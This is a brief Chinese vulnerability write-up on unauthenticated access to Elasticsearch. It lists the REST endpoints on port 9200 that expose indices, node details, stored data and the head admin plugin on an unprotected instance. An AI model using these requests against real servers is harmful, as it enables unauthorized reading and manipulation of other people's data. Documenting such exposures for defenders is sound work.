# Elasticsearch 未授权访问
## 漏洞描述
Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据
## 漏洞影响
> [!NOTE]
>
> Elasticsearch
## 漏洞复现
访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node
“`
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes //查看节点数据
http://localhost:9200/_plugin/head/ //web管理界面(head插件)
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容